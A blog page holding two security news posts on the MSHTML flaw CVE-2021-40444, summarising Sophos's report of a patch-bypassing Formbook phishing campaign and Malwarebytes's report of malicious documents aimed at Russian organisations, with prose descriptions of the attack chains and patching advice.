Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label MSHTML Attacks. Show all posts

Malware Attackers Could Circumvent a Critical Microsoft MSHTML Flaw Due to a New Exploit

 

A brief phishing campaign was noticed that took advantage of a unique exploit which circumvented a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component, with the purpose of spreading Formbook malware. "The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker," SophosLabs researchers Andrew Brandt and Stephen Ormandy said in a new report. 

CVE-2021-40444 (CVSS score: 8.8) is a remote code execution flaw in MSHTML that might be exploited using carefully designed Microsoft Office documents. Although Microsoft repaired the security flaw in its September 2021 Patch Tuesday releases, it has been used in various attacks since the flaw's information became public. 

The same month, the technology giant discovered a targeted phishing campaign that used the vulnerability to install Cobalt Strike Beacons on affected Windows systems. According to Microsoft Threat Intelligence Center, the assaults exploited the vulnerability as part of an initial access effort that included modified Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure associated with several cybercriminal schemes, including human-operated ransomware, according to Microsoft. 

Sophos found a new campaign that seeks to circumvent the patch's safeguards by modifying a publicly accessible proof-of-concept Office exploit and weaponizing it to distribute Formbook malware. According to the cybersecurity firm, the attack's success can be due to a "too-narrowly focused patch." 

"In the initial versions of CVE-2021-40444 exploits, the malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file," the researchers explained. "When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive." 

The modified attack, known as CAB-less 40444, ran for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were delivered to potential victims. In turn, the RAR file contained a script written in Windows Script Host (WSH) and a Word Document that, when opened, contacted a remote server hosting malicious JavaScript. As a result, the JavaScript code used the Word Document to start the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the Formbook malware payload from an attacker-controlled website. 

The fact that the modified RAR archive files wouldn't operate with older versions of the WinRAR software explains why the exploit vanished after just over a day of use. "Unexpectedly, in this case, users of the much older, obsolete version of WinRAR would have been better protected than users of the most recent release," the researchers wrote. 

MSHTML Attack Targets Russian State Rocket Centre and Interior Ministry

 

An MSHTML vulnerability listed under CVE-2021-40444 is being used to target Russian entities, as per Malwarebytes. 

Malwarebytes Intelligence has detected email attachments directed especially against Russian enterprises. The first template they discovered is structured to resemble an internal communication within JSC GREC Makeyev. 

The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic asset of the country's defence and industrial complex for both the rocket and space industries. It is also the primary manufacturer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centres for developing rocket and space technology. 

The email purports to be from the organization's Human Resources (HR) department. It stated that HR is conducting a check of the personal information given by workers. Employees are asked to fill out a form and send it to HR, or to respond to the email. 

When the recipient wishes to fill out the form, they must allow editing. And that action is sufficient to activate the exploit. When the target opens a malicious Office document, MSHTML loads a specially designed ActiveX control. The loaded ActiveX control can then execute arbitrary code to attack the machine with further malware. 

The second file, Malwarebytes discovered appears to be from Moscow's Ministry of the Interior. The attachment may be used to aim at a variety of fascinating targets. The documents' title translates to "Notification of illegal activity." 

It requests that the recipient complete the form and submit it to the Ministry of Internal Affairs, or respond to the email. It also encourages the targeted victim to do so within seven days. 

Malwarebytes further stated, they seldom come across proof of cybercrime against Russian targets. Given the targets, particularly the first, they think a state-sponsored actor is behind these assaults, and are investigating the source of the strikes. 

Vulnerability Patch

The CVE-2021-40444 vulnerability is rather outdated in nature (it involves ActiveX) however, it was just recently discovered. It wasn't long before threat actors were posting proofs-of-concept, tutorials, and exploits on hacker forums, allowing anybody to conduct their own assaults by following step-by-step instructions.

Microsoft immediately issued mitigation instructions that blocked the installation of new ActiveX controls and managed to squeeze a fix into its most recent Patch Tuesday release, just a few weeks after the flaw was made public. 

The time it takes to build a patch, on the other hand, is frequently overshadowed by the time it takes users to apply it. Organizations, particularly large ones, are frequently discovered to be far behind in patching, thus the chances of more cyberattacks like these increase.